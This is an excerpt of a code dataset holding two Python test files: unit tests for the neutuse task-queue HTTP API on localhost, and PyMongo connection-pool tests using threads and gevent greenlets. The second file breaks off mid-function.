source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
test.py
|
'''
This File tests neutuse HTTP APIS.
If everything is fine, you should see 'OK' at the bottom of the screen.
'''
import unittest
import json
import threading
import time
import requests as rq
import neutuse
ADDR = '127.0.0.1:8080'
JSON_HEADER = {'Content-Type':'application/json'}
BASE_URL = 'http://'+ ADDR + '/api/v1/'
class TestNeutuseHTTPAPIV1(unittest.TestCase):
def test_post_tasks(self):
url = BASE_URL + 'tasks'
task = {
'type':'dvid',
'name':'skeletonize',
'description':'test',
'config':{'input':'test','bodyid':1},
'life_span':3600,
'max_tries':1,
'user':'test'
}
rv = rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
self.assertEqual(rv.status_code,200)
task = {
'type':'dvid',
'name':'skeletonize',
'config':{'input':'test','bodyid':1},
'wrong':'wrong'
}
rv = rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
self.assertEqual(rv.status_code,400)
task = {
'wrong':'dvid',
'name':'skeletonize',
'config':{'input':'test','bodyid':1}
}
rv = rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
self.assertEqual(rv.status_code,400)
task = {
'type':'dvid',
'name':'skeletonize',
'config': 'wrong'
}
rv = rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
self.assertEqual(rv.status_code,400)
task = {
'type':'dvid',
'config': 'wrong'
}
rv = rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
self.assertEqual(rv.status_code,400)
def test_get_tasks(self):
url = BASE_URL + 'tasks'
task = {
'type':'abc',
'name':'skeletonize',
'description':'test',
'config':{'input':'test','bodyid':1},
'life_span':300,
'max_tries':100,
'user':'test'
}
rv_task = rq.post(url, data=json.dumps(task), headers=JSON_HEADER).json()
rv = rq.get(url,params={'id':rv_task['id']})
self.assertEqual(rv.status_code,200)
self.assertEqual(len(rv.json()),1)
task = rv.json()[0]
for key in task:
self.assertEqual(task[key], rv_task[key])
rv = rq.get(url,params={'id':rv_task['id'],'name':'skeletonize'})
self.assertEqual(rv.status_code,200)
self.assertEqual(len(rv.json()),1)
task = rv.json()[0]
for key in task:
self.assertEqual(task[key], rv_task[key])
rv = rq.get(url,params={'ids':rv_task['id']})
self.assertEqual(rv.status_code,400)
rv = rq.get(url,params={'id':rv_task['id'],'name':'skeletonze'})
self.assertEqual(rv.status_code,400)
def test_get_task_by_id(self):
url = BASE_URL + 'tasks'
task = {
'type':'abc',
'name':'skeletonize',
'config':{'input':'test','bodyid':1},
}
rv_task = rq.post(url, data=json.dumps(task), headers=JSON_HEADER).json()
rv = rq.get(url+'/{}'.format(rv_task['id']))
self.assertEqual(rv.status_code,200)
task = rv.json()
for key in task:
self.assertEqual(task[key], rv_task[key])
rv = rq.get(url+'/{}'.format(101011123))
self.assertEqual(rv.status_code,400)
def test_get_task_property_by_id(self):
url = BASE_URL + 'tasks'
task = {
'type':'abc',
'name':'skeletonize',
'config':{'input':'test','bodyid':1},
}
rv_task = rq.post(url, data=json.dumps(task), headers=JSON_HEADER).json()
rv = rq.get(url+'/{}/config'.format(rv_task['id']))
self.assertEqual(rv.status_code,200)
config = rv.json()
self.assertEqual(task['config'],config)
rv = rq.get(url+'/{}/as'.format(rv_task['id']))
self.assertEqual(rv.status_code,400)
def test_top_k_tasks(self):
url = BASE_URL + 'tasks'
task = {
'type':'dvid',
'name':'skeletonize',
'config':{'input':'test','bodyid':1},
'priority':1000,
'description':'1'
}
rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
task['priority'] = 1001
task['description'] ='2'
rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
task['priority'] = 1001
task['description'] ='3'
rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
task['priority'] = 9999
task['description'] ='4'
rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
rv = rq.get(url+'/top/dvid/skeletonize/4')
self.assertEqual(rv.status_code,200)
self.assertEqual(len(rv.json()),4)
self.assertEqual(rv.json()[0]['description'],'4')
self.assertEqual(rv.json()[1]['description'],'2')
self.assertEqual(rv.json()[2]['description'],'3')
self.assertEqual(rv.json()[3]['description'],'1')
rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
task['priority'] = 10001
task['description'] ='20'
rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
task['description'] = 10001
task['description'] ='30'
rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
task['priority'] = 99999
task['description'] ='40'
rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
rq.post(url, data=json.dumps(task), headers=JSON_HEADER)
rv = rq.get(url+'/top/dvid/skeletonize/1')
self.assertEqual(len(rv.json()),1)
rv = rq.get(url+'/top/dvid1/skeletonize/1')
self.assertEqual(rv.status_code,400)
rv = rq.get(url+'/top/dvid/skeletonize2/1')
self.assertEqual(rv.status_code,400)
def test_post_task_status(self):
url = BASE_URL + 'tasks'
task = {
'type':'abc',
'name':'skeletonize',
'config':{'input':'test','bodyid':1},
}
rv_task = rq.post(url, data=json.dumps(task), headers=JSON_HEADER).json()
rv = rq.post(url+'/{}/status/processing'.format(rv_task['id']))
self.assertEqual(rv.status_code,200)
self.assertEqual(rv.json()['status'],'processing')
rv = rq.post(url+'/{}/status/failed'.format(rv_task['id']))
self.assertEqual(rv.status_code,200)
self.assertEqual(rv.json()['status'],'failed')
rv = rq.post(url+'/{}/status/done'.format(rv_task['id']))
self.assertEqual(rv.status_code,200)
self.assertEqual(rv.json()['status'],'done')
rv = rq.post(url+'/{}/status/processings'.format(rv_task['id']))
self.assertEqual(rv.status_code,400)
def test_post_task_comments(self):
url = BASE_URL + 'tasks'
task = {
'type':'abc',
'name':'skeletonize',
'config':{'input':'test','bodyid':1},
}
rv_task = rq.post(url, data=json.dumps(task), headers=JSON_HEADER).json()
rv = rq.get(url+'/{}/comments'.format(rv_task['id'])).json()
self.assertEqual(rv,[])
rq.post(url+'/{}/comments'.format(rv_task['id']), data='123', headers=JSON_HEADER)
rv = rq.get(url+'/{}/comments'.format(rv_task['id'])).json()
self.assertEqual(rv,['123'])
rq.post(url+'/{}/comments'.format(rv_task['id']), data='456', headers=JSON_HEADER)
rv = rq.get(url+'/{}/comments'.format(rv_task['id'])).json()
self.assertEqual(rv,['123','456'])
if __name__ == '__main__':
threading.Thread(target = neutuse.run_database, args=(ADDR, 'sqlite:{}.db'.format(time.time()))).start()
time.sleep(1)
unittest.main()
|
test_pooling_base.py
|
# Copyright 2012 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base classes to test built-in connection-pooling with threads or greenlets.
"""
import gc
import random
import socket
import sys
import thread
import threading
import time
sys.path[0:0] = [""]
from nose.plugins.skip import SkipTest
import pymongo.pool
from pymongo.mongo_client import MongoClient
from pymongo.pool import Pool, NO_REQUEST, NO_SOCKET_YET, SocketInfo
from pymongo.errors import ConfigurationError, ConnectionFailure
from pymongo.errors import ExceededMaxWaiters
from test import version, host, port
from test.test_client import get_client
from test.utils import delay, is_mongos, one
N = 50
DB = "pymongo-pooling-tests"
if sys.version_info[0] >= 3:
from imp import reload
try:
import gevent
from gevent import Greenlet, monkey, hub
import gevent.coros, gevent.event
has_gevent = True
except ImportError:
has_gevent = False
def gc_collect_until_done(threads, timeout=60):
start = time.time()
running = list(threads)
while running:
assert (time.time() - start) < timeout, "Threads timed out"
for t in running:
t.thread.join(0.1)
if not t.alive:
running.remove(t)
gc.collect()
class MongoThread(object):
"""A thread, or a greenlet, that uses a MongoClient"""
def __init__(self, test_case):
self.use_greenlets = test_case.use_greenlets
self.client = test_case.c
self.db = self.client[DB]
self.ut = test_case
self.passed = False
def start(self):
if self.use_greenlets:
# A Gevent extended Greenlet
self.thread = Greenlet(self.run)
else:
self.thread = threading.Thread(target=self.run)
self.thread.setDaemon(True) # Don't hang whole test if thread hangs
self.thread.start()
@property
def alive(self):
if self.use_greenlets:
return not self.thread.dead
else:
return self.thread.isAlive()
def join(self):
self.thread.join(10)
if self.use_greenlets:
msg = "Greenlet timeout"
else:
msg = "Thread timeout"
assert not self.alive, msg
self.thread = None
def run(self):
self.run_mongo_thread()
# No exceptions thrown
self.passed = True
def run_mongo_thread(self):
raise NotImplementedError()
class SaveAndFind(MongoThread):
def run_mongo_thread(self):
for _ in xrange(N):
rand = random.randint(0, N)
_id = self.db.sf.save({"x": rand})
self.ut.assertEqual(rand, self.db.sf.find_one(_id)["x"])
class Unique(MongoThread):
def run_mongo_thread(self):
for _ in xrange(N):
self.client.start_request()
self.db.unique.insert({}) # no error
self.client.end_request()
class NonUnique(MongoThread):
def run_mongo_thread(self):
for _ in xrange(N):
self.client.start_request()
self.db.unique.insert({"_id": "jesse"}, w=0)
self.ut.assertNotEqual(None, self.db.error())
self.client.end_request()
class Disconnect(MongoThread):
def run_mongo_thread(self):
for _ in xrange(N):
self.client.disconnect()
class NoRequest(MongoThread):
def run_mongo_thread(self):
self.client.start_request()
errors = 0
for _ in xrange(N):
self.db.unique.insert({"_id": "jesse"}, w=0)
if not self.db.error():
errors += 1
self.client.end_request()
self.ut.assertEqual(0, errors)
def run_cases(ut, cases):
threads = []
nruns = 10
if (
ut.use_greenlets and sys.platform == 'darwin'
and gevent.version_info[0] < 1
):
# Gevent 0.13.6 bug on Mac, Greenlet.join() hangs if more than
# about 35 Greenlets share a MongoClient. Apparently fixed in
# recent Gevent development.
nruns = 5
for case in cases:
for i in range(nruns):
t = case(ut)
t.start()
threads.append(t)
for t in threads:
t.join()
for t in threads:
assert t.passed, "%s.run_mongo_thread() threw an exception" % repr(t)
class OneOp(MongoThread):
def __init__(self, ut):
super(OneOp, self).__init__(ut)
def run_mongo_thread(self):
pool = self.client._MongoClient__pool
assert len(pool.sockets) == 1, "Expected 1 socket, found %d" % (
len(pool.sockets)
)
sock_info = one(pool.sockets)
self.client.start_request()
# start_request() hasn't yet moved the socket from the general pool into
# the request
assert len(pool.sockets) == 1
assert one(pool.sockets) == sock_info
self.client[DB].test.find_one()
# find_one() causes the socket to be used in the request, so now it's
# bound to this thread
assert len(pool.sockets) == 0
assert pool._get_request_state() == sock_info
self.client.end_request()
# The socket is back in the pool
assert len(pool.sockets) == 1
assert one(pool.sockets) == sock_info
class CreateAndReleaseSocket(MongoThread):
"""A thread or greenlet that acquires a socket, waits for all other threads
to reach rendezvous point, then terminates.
"""
class Rendezvous(object):
def __init__(self, nthreads, use_greenlets):
self.nthreads = nthreads
self.nthreads_run = 0
self.use_greenlets = use_greenlets
if use_greenlets:
self.lock = gevent.coros.RLock()
else:
self.lock = threading.Lock()
self.reset_ready()
def reset_ready(self):
if self.use_greenlets:
self.ready = gevent.event.Event()
else:
self.ready = threading.Event()
def __init__(self, ut, client, start_request, end_request, rendezvous):
super(CreateAndReleaseSocket, self).__init__(ut)
self.client = client
self.start_request = start_request
self.end_request = end_request
self.rendezvous = rendezvous
def run_mongo_thread(self):
# Do an operation that requires a socket.
# test_max_pool_size uses this to spin up lots of threads requiring
# lots of simultaneous connections, to ensure that Pool obeys its
# max_size configuration and closes extra sockets as they're returned.
for i in range(self.start_request):
self.client.start_request()
# Use a socket
self.client[DB].test.find_one()
# Don't finish until all threads reach this point
r = self.rendezvous
r.lock.acquire()
r.nthreads_run += 1
if r.nthreads_run == r.nthreads:
# Everyone's here, let them finish
r.ready.set()
r.lock.release()
else:
r.lock.release()
r.ready.wait(2) # Wait two seconds
assert r.ready.isSet(), "Rendezvous timed out"
for i in range(self.end_request):
self.client.end_request()
class CreateAndReleaseSocketNoRendezvous(MongoThread):
"""A thread or greenlet that acquires a socket and terminates without
waiting for other threads to reach rendezvous point.
"""
class Rendezvous(object):
def __init__(self, nthreads, use_greenlets):
self.nthreads = nthreads
self.nthreads_run = 0
if use_greenlets:
self.lock = gevent.coros.RLock()
self.ready = gevent.event.Event()
else:
self.lock = threading.Lock()
self.ready = threading.Event()
def __init__(self, ut, client, start_request, end_request):
super(CreateAndReleaseSocketNoRendezvous, self).__init__(ut)
self.client = client
self.start_request = start_request
self.end_request = end_request
def run_mongo_thread(self):
# Do an operation that requires a socket.
# test_max_pool_size uses this to spin up lots of threads requiring
# lots of simultaneous connections, to ensure that Pool obeys its
# max_size configuration and closes extra sockets as they're returned.
for i in range(self.start_request):
self.client.start_request()
# Use a socket
self.client[DB].test.find_one()
for i in range(self.end_request):
self.client.end_request()
class _TestPoolingBase(object):
"""Base class for all client-pool tests. Doesn't inherit from
unittest.TestCase, and its name is prefixed with "_" to avoid being
run by nose. Real tests double-inherit from this base and from TestCase.
"""
use_greenlets = False
def setUp(self):
if self.use_greenlets:
if not has_gevent:
raise SkipTest("Gevent not installed")
# Note we don't do patch_thread() or patch_all() - we're
# testing here that patch_thread() is unnecessary for
# the client pool to work properly.
monkey.patch_socket()
self.c = self.get_client(auto_start_request=False)
# reset the db
db = self.c[DB]
db.unique.drop()
db.test.drop()
db.unique.insert({"_id": "jesse"})
db.test.insert([{} for i in range(10)])
def tearDown(self):
self.c.close()
if self.use_greenlets:
# Undo patch
reload(socket)
def get_client(self, *args, **kwargs):
opts = kwargs.copy()
opts['use_greenlets'] = self.use_greenlets
return get_client(*args, **opts)
def get_pool(self, *args, **kwargs):
kwargs['use_greenlets'] = self.use_greenlets
return Pool(*args, **kwargs)
def sleep(self, seconds):
if self.use_greenlets:
gevent.sleep(seconds)
else:
time.sleep(seconds)
def assert_no_request(self):
self.assertEqual(
NO_REQUEST, self.c._MongoClient__pool._get_request_state()
)
def assert_request_without_socket(self):
self.assertEqual(
NO_SOCKET_YET, self.c._MongoClient__pool._get_request_state()
)
def assert_request_with_socket(self):
self.assertTrue(isinstance(
self.c._MongoClient__pool._get_request_state(), SocketInfo
))
def assert_pool_size(self, pool_size):
self.assertEqual(
pool_size, len(self.c._MongoClient__pool.sockets)
)
class _TestPooling(_TestPoolingBase):
"""Basic pool tests, to be run both with threads and with greenlets."""
def test_max_pool_size_validation(self):
self.assertRaises(
ConfigurationError, MongoClient, host=host, port=port,
max_pool_size=-1
)
self.assertRaises(
ConfigurationError, MongoClient, host=host, port=port,
max_pool_size='foo'
)
c = MongoClient(host=host, port=port, max_pool_size=100)
self.assertEqual(c.max_pool_size, 100)
def test_no_disconnect(self):
run_cases(self, [NoRequest, NonUnique, Unique, SaveAndFind])
def test_simple_disconnect(self):
# MongoClient just created, expect 1 free socket
self.assert_pool_size(1)
self.assert_no_request()
self.c.start_request()
self.assert_request_without_socket()
cursor = self.c[DB].stuff.find()
# Cursor hasn't actually caused a request yet, so there's still 1 free
# socket.
self.assert_pool_size(1)
self.assert_request_without_socket()
# Actually make a request to server, triggering a socket to be
# allocated to the request
list(cursor)
self.assert_pool_size(0)
self.assert_request_with_socket()
# Pool returns to its original state
self.c.end_request()
self.assert_no_request()
self.assert_pool_size(1)
self.c.disconnect()
self.assert_pool_size(0)
self.assert_no_request()
def test_disconnect(self):
run_cases(self, [SaveAndFind, Disconnect, Unique])
def test_independent_pools(self):
# Test for regression of very early PyMongo bug: separate pools shared
# state.
p = self.get_pool((host, port), 10, None, None, False)
self.c.start_request()
self.c.pymongo_test.test.find_one()
self.assertEqual(set(), p.sockets)
self.c.end_request()
self.assert_pool_size(1)
self.assertEqual(set(), p.sockets)
def test_dependent_pools(self):
self.assert_pool_size(1)
self.c.start_request()
self.assert_request_without_socket()
self.c.pymongo_test.test.find_one()
self.assert_request_with_socket()
self.assert_pool_size(0)
self.c.end_request()
self.assert_pool_size(1)
t = OneOp(self)
t.start()
t.join()
self.assertTrue(t.passed, "OneOp.run() threw exception")
self.assert_pool_size(1)
self.c.pymongo_test.test.find_one()
self.assert_pool_size(1)
def test_multiple_connections(self):
a = self.get_client(auto_start_request=False)
b = self.get_client(auto_start_request=False)
self.assertEqual(1, len(a._MongoClient__pool.sockets))
self.assertEqual(1, len(b._MongoClient__pool.sockets))
a.start_request()
a.pymongo_test.test.find_one()
self.assertEqual(0, len(a._MongoClient__pool.sockets))
a.end_request()
self.assertEqual(1, len(a._MongoClient__pool.sockets))
self.assertEqual(1, len(b._MongoClient__pool.sockets))
a_sock = one(a._MongoClient__pool.sockets)
b.end_request()
self.assertEqual(1, len(a._MongoClient__pool.sockets))
self.assertEqual(1, len(b._MongoClient__pool.sockets))
b.start_request()
b.pymongo_test.test.find_one()
self.assertEqual(1, len(a._MongoClient__pool.sockets))
self.assertEqual(0, len(b._MongoClient__pool.sockets))
b.end_request()
b_sock = one(b._MongoClient__pool.sockets)
b.pymongo_test.test.find_one()
a.pymongo_test.test.find_one()
self.assertEqual(b_sock,
b._MongoClient__pool.get_socket((b.host, b.port)))
self.assertEqual(a_sock,
a._MongoClient__pool.get_socket((a.host, a.port)))
a_sock.close()
b_sock.close()
def test_request(self):
# Check that Pool gives two different sockets in two calls to
# get_socket() -- doesn't automatically put us in a request any more
cx_pool = self.get_pool(
pair=(host,port),
max_size=10,
net_timeout=1000,
conn_timeout=1000,
use_ssl=False
)
sock0 = cx_pool.get_socket()
sock1 = cx_pool.get_socket()
self.assertNotEqual(sock0, sock1)
# Now in a request, we'll get the same socket both times
cx_pool.start_request()
sock2 = cx_pool.get_socket()
sock3 = cx_pool.get_socket()
self.assertEqual(sock2, sock3)
# Pool didn't keep reference to sock0 or sock1; sock2 and 3 are new
self.assertNotEqual(sock0, sock2)
self.assertNotEqual(sock1, sock2)
# Return the request sock to pool
cx_pool.end_request()
sock4 = cx_pool.get_socket()
sock5 = cx_pool.get_socket()
# Not in a request any more, we get different sockets
self.assertNotEqual(sock4, sock5)
# end_request() returned sock2 to pool
self.assertEqual(sock4, sock2)
for s in [sock0, sock1, sock2, sock3, sock4, sock5]:
s.close()
def test_reset_and_request(self):
# reset() is called after a fork, or after a socket error. Ensure that
# a new request is begun if a request was in progress when the reset()
# occurred, otherwise no request is begun.
p = self.get_pool((host, port), 10, None, None, False)
self.assertFalse(p.in_request())
p.start_request()
self.assertTrue(p.in_request())
p.reset()
self.assertTrue(p.in_request())
p.end_request()
self.assertFalse(p.in_request())
p.reset()
self.assertFalse(p.in_request())
def test_pool_reuses_open_socket(self):
# Test Pool's _check_closed() method doesn't close a healthy socket
cx_pool = self.get_pool((host,port), 10, None, None, False)
cx_pool._check_interval_seconds = 0 # Always check.
sock_info = cx_pool.get_socket()
cx_pool.maybe_return_socket(sock_info)
new_sock_info = cx_pool.get_socket()
self.assertEqual(sock_info, new_sock_info)
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(1, len(cx_pool.sockets))
def test_pool_removes_dead_socket(self):
# Test that Pool removes dead socket and the socket doesn't return
# itself PYTHON-344
cx_pool = self.get_pool((host,port), 10, None, None, False)
cx_pool._check_interval_seconds = 0 # Always check.
sock_info = cx_pool.get_socket()
# Simulate a closed socket without telling the SocketInfo it's closed
sock_info.sock.close()
self.assertTrue(pymongo.pool._closed(sock_info.sock))
cx_pool.maybe_return_socket(sock_info)
new_sock_info = cx_pool.get_socket()
self.assertEqual(0, len(cx_pool.sockets))
self.assertNotEqual(sock_info, new_sock_info)
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(1, len(cx_pool.sockets))
def test_pool_removes_dead_request_socket_after_check(self):
# Test that Pool keeps request going even if a socket dies in request
cx_pool = self.get_pool((host,port), 10, None, None, False)
cx_pool._check_interval_seconds = 0 # Always check.
cx_pool.start_request()
# Get the request socket
sock_info = cx_pool.get_socket()
self.assertEqual(0, len(cx_pool.sockets))
self.assertEqual(sock_info, cx_pool._get_request_state())
sock_info.sock.close()
cx_pool.maybe_return_socket(sock_info)
# Although the request socket died, we're still in a request with a
# new socket
new_sock_info = cx_pool.get_socket()
self.assertTrue(cx_pool.in_request())
self.assertNotEqual(sock_info, new_sock_info)
self.assertEqual(new_sock_info, cx_pool._get_request_state())
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(new_sock_info, cx_pool._get_request_state())
self.assertEqual(0, len(cx_pool.sockets))
cx_pool.end_request()
self.assertEqual(1, len(cx_pool.sockets))
def test_pool_removes_dead_request_socket(self):
# Test that Pool keeps request going even if a socket dies in request
cx_pool = self.get_pool((host,port), 10, None, None, False)
cx_pool.start_request()
# Get the request socket
sock_info = cx_pool.get_socket()
self.assertEqual(0, len(cx_pool.sockets))
self.assertEqual(sock_info, cx_pool._get_request_state())
# Unlike in test_pool_removes_dead_request_socket_after_check, we
# set sock_info.closed and *don't* wait for it to be checked.
sock_info.close()
cx_pool.maybe_return_socket(sock_info)
# Although the request socket died, we're still in a request with a
# new socket
new_sock_info = cx_pool.get_socket()
self.assertTrue(cx_pool.in_request())
self.assertNotEqual(sock_info, new_sock_info)
self.assertEqual(new_sock_info, cx_pool._get_request_state())
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(new_sock_info, cx_pool._get_request_state())
self.assertEqual(0, len(cx_pool.sockets))
cx_pool.end_request()
self.assertEqual(1, len(cx_pool.sockets))
def test_pool_removes_dead_socket_after_request(self):
# Test that Pool handles a socket dying that *used* to be the request
# socket.
cx_pool = self.get_pool((host,port), 10, None, None, False)
cx_pool._check_interval_seconds = 0 # Always check.
cx_pool.start_request()
# Get the request socket
sock_info = cx_pool.get_socket()
self.assertEqual(sock_info, cx_pool._get_request_state())
cx_pool.maybe_return_socket(sock_info)
# End request
cx_pool.end_request()
self.assertEqual(1, len(cx_pool.sockets))
# Kill old request socket
sock_info.sock.close()
# Dead socket detected and removed
new_sock_info = cx_pool.get_socket()
self.assertFalse(cx_pool.in_request())
self.assertNotEqual(sock_info, new_sock_info)
self.assertEqual(0, len(cx_pool.sockets))
self.assertFalse(pymongo.pool._closed(new_sock_info.sock))
cx_pool.maybe_return_socket(new_sock_info)
self.assertEqual(1, len(cx_pool.sockets))
def test_dead_request_socket_with_max_size(self):
# When a pool replaces a dead request socket, the semaphore it uses
# to enforce max_size should remain unaffected.
cx_pool = self.get_pool(
(host, port), 1, None, None, False, wait_queue_timeout=1)
cx_pool._check_interval_seconds = 0 # Always check.
cx_pool.start_request()
# Get and close the request socket.
request_sock_info = cx_pool.get_socket()
request_sock_info.sock.close()
cx_pool.maybe_return_socket(request_sock_info)
# Detects closed socket and creates new one, semaphore value still 0.
request_sock_info_2 = cx_pool.get_socket()
self.assertNotEqual(request_sock_info, request_sock_info_2)
cx_pool.maybe_return_socket(request_sock_info_2)
cx_pool.end_request()
# Semaphore value now 1; we can get a socket.
sock_info = cx_pool.get_socket()
# Clean up.
cx_pool.maybe_return_socket(sock_info)
def test_socket_reclamation(self):
if sys.platform.startswith('java'):
raise SkipTest("Jython can't do socket reclamation")
# Check that if a thread starts a request and dies without ending
# the request, that the socket is reclaimed into the pool.
cx_pool = self.get_pool(
pair=(host,port),
max_size=10,
net_timeout=1000,
conn_timeout=1000,
use_ssl=False,
)
self.assertEqual(0, len(cx_pool.sockets))
lock = None
the_sock = [None]
def leak_request():
self.assertEqual(NO_REQUEST, cx_pool._get_request_state())
cx_pool.start_request()
self.assertEqual(NO_SOCKET_YET, cx_pool._get_request_state())
sock_info = cx_pool.get_socket()
self.assertEqual(sock_info, cx_pool._get_request_state())
the_sock[0] = id(sock_info.sock)
cx_pool.maybe_return_socket(sock_info)
if not self.use_greenlets:
lock.release()
if self.use_greenlets:
g = Greenlet(leak_request)
g.start()
g.join(1)
self.assertTrue(g.ready(), "Greenlet is hung")
# In Gevent after 0.13.8, join() returns before the Greenlet.link
# callback fires. Give it a moment to reclaim the socket.
gevent.sleep(0.1)
else:
lock = thread.allocate_lock()
lock.acquire()
# Start a thread WITHOUT a threading.Thread - important to test that
# Pool can deal with primitive threads.
thread.start_new_thread(leak_request, ())
# Join thread
acquired = lock.acquire()
self.assertTrue(acquired, "Thread is hung")
# Make sure thread is really gone
time.sleep(1)
if 'PyPy' in sys.version:
gc.collect()
# Access the thread local from the main thread to trigger the
# ThreadVigil's delete callback, returning the request socket to
# the pool.
# In Python 2.7.0 and lesser, a dead thread's locals are deleted
# and those locals' weakref callbacks are fired only when another
# thread accesses the locals and finds the thread state is stale,
# see http://bugs.python.org/issue1868. Accessing the thread
# local from the main thread is a necessary part of this test, and
# realistic: in a multithreaded web server a new thread will access
# Pool._ident._local soon after an old thread has died.
cx_pool._ident.get()
# Pool reclaimed the socket
self.assertEqual(1, len(cx_pool.sockets))
self.assertEqual(the_sock[0], id(one(cx_pool.sockets).sock))
self.assertEqual(0, len(cx_pool._tid_to_sock))
class _TestMaxPoolSize(_TestPoolingBase):
"""Test that connection pool keeps proper number of idle sockets open,
no matter how start/end_request are called. To be run both with threads and
with greenlets.
"""
def _test_max_pool_size(
self, start_request, end_request, max_pool_size=4, nthreads=10):
"""Start `nthreads` threads. Each calls start_request `start_request`
times, then find_one and waits at a barrier; once all reach the barrier
each calls end_request `end_request` times. The test asserts that the
pool ends with min(max_pool_size, nthreads) sockets or, if
start_request wasn't called, at least one socket.
This tests both max_pool_size enforcement and that leaked request
sockets are eventually returned to the pool when their threads end.
You may need to increase ulimit -n on Mac.
If you increase nthreads over about 35, note a
Gevent 0.13.6 bug on Mac: Greenlet.join() hangs if more than
about 35 Greenlets share a MongoClient. Apparently fixed in
recent Gevent development.
"""
if start_request:
if max_pool_size is not None and max_pool_size < nthreads:
raise AssertionError("Deadlock")
c = self.get_client(
max_pool_size=max_pool_size, auto_start_request=False)
rendezvous = CreateAndReleaseSocket.Rendezvous(
nthreads, self.use_greenlets)
threads = []
for i in range(nthreads):
t = CreateAndReleaseSocket(
self, c, start_request, end_request, rendezvous)
threads.append(t)
for t in threads:
t.start()
if 'PyPy' in sys.version:
# With PyPy we need to kick off the gc whenever the threads hit the
# rendezvous since nthreads > max_pool_size.
gc_collect_until_done(threads)
else:
for t in threads:
t.join()
# join() returns before the thread state is cleared; give it time.
self.sleep(1)
for t in threads:
self.assertTrue(t.passed)
# Socket-reclamation doesn't work in Jython
if not sys.platform.startswith('java'):
cx_pool = c._MongoClient__pool
# Socket-reclamation depends on timely garbage-collection
if 'PyPy' in sys.version:
gc.collect()
if self.use_greenlets:
# Wait for Greenlet.link() callbacks to execute
the_hub = hub.get_hub()
if hasattr(the_hub, 'join'):
# Gevent 1.0
the_hub.join()
else:
# Gevent 0.13 and less
the_hub.shutdown()
if start_request:
# Trigger final cleanup in Python <= 2.7.0.
cx_pool._ident.get()
expected_idle = min(max_pool_size, nthreads)
message = (
'%d idle sockets (expected %d) and %d request sockets'
' (expected 0)' % (
len(cx_pool.sockets), expected_idle,
len(cx_pool._tid_to_sock)))
self.assertEqual(
expected_idle, len(cx_pool.sockets), message)
else:
# Without calling start_request(), threads can safely share
# sockets; the number running concurrently, and hence the
# number of sockets needed, is between 1 and 10, depending
# on thread-scheduling.
self.assertTrue(len(cx_pool.sockets) >= 1)
# thread.join completes slightly *before* thread locals are
# cleaned up, so wait up to 5 seconds for them.
self.sleep(0.1)
cx_pool._ident.get()
start = time.time()
while (
not cx_pool.sockets
and cx_pool._socket_semaphore.counter < max_pool_size
and (time.time() - start) < 5
):
self.sleep(0.1)
cx_pool._ident.get()
if max_pool_size is not None:
self.assertEqual(
max_pool_size,
cx_pool._socket_semaphore.counter)
self.assertEqual(0, len(cx_pool._tid_to_sock))
def _test_max_pool_size_no_rendezvous(self, start_request, end_request):
max_pool_size = 5
c = self.get_client(
max_pool_size=max_pool_size, auto_start_request=False)
# If you increase nthreads over about 35, note a
# Gevent 0.13.6 bug on Mac, Greenlet.join() hangs if more than
# about 35 Greenlets share a MongoClient. Apparently fixed in
# recent Gevent development.
# On the other hand, nthreads had better be much larger than
# max_pool_size to ensure that max_pool_size sockets are actually
# required at some point in this test's execution.
nthreads = 30
if (sys.platform.startswith('java')
and start_request > end_request
and nthreads > max_pool_size):
# Since Jython can't reclaim the socket and release the semaphore
# after a thread leaks a request, we'll exhaust the semaphore and
# deadlock.
raise SkipTest("Jython can't do socket reclamation")
threads = []
for i in range(nthreads):
t = CreateAndReleaseSocketNoRendezvous(
self, c, start_request, end_request)
threads.append(t)
for t in threads:
t.start()
if 'PyPy' in sys.version:
# With PyPy we need to kick off the gc whenever the threads hit the
# rendezvous since nthreads > max_pool_size.
gc_collect_until_done(threads)
else:
for t in threads:
t.join()
for t in threads:
self.assertTrue(t.passed)
cx_pool = c._MongoClient__pool
# Socket-reclamation depends on timely garbage-collection
if 'PyPy' in sys.version:
gc.collect()
if self.use_greenlets:
# Wait for Greenlet.link() callbacks to execute
the_hub = hub.get_hub()
if hasattr(the_hub, 'join'):
# Gevent 1.0
the_hub.join()
else:
# Gevent 0.13 and less
the_hub.shutdown()
# thread.join completes slightly *before* thread locals are
# cleaned up, so wait up to 5 seconds for them.
self.sleep(0.1)
cx_pool._ident.get()
start = time.time()
while (
not cx_pool.sockets
and cx_pool._socket_semaphore.counter < max_pool_size
and (time.time() - start) < 5
):
self.sleep(0.1)
cx_pool._ident.get()
self.assertTrue(len(cx_pool.sockets) >= 1)
self.assertEqual(max_pool_size, cx_pool._socket_semaphore.counter)
def test_max_pool_size(self):
self._test_max_pool_size(
start_request=0, end_request=0, nthreads=10, max_pool_size=4)
def test_max_pool_size_none(self):
self._test_max_pool_size(
start_request=0, end_request=0, nthreads=10, max_pool_size=None)
def test_max_pool_size_with_request(self):
self._test_max_pool_size(
start_request=1, end_request=1, nthreads=10, max_pool_size=10)
def test_max_pool_size_with_multiple_request(self):
self._test_max_pool_size(
start_request=10, end_request=10, nthreads=10, max_pool_size=10)
def test_max_pool_size_with_redundant_request(self):
self._test_max_pool_size(
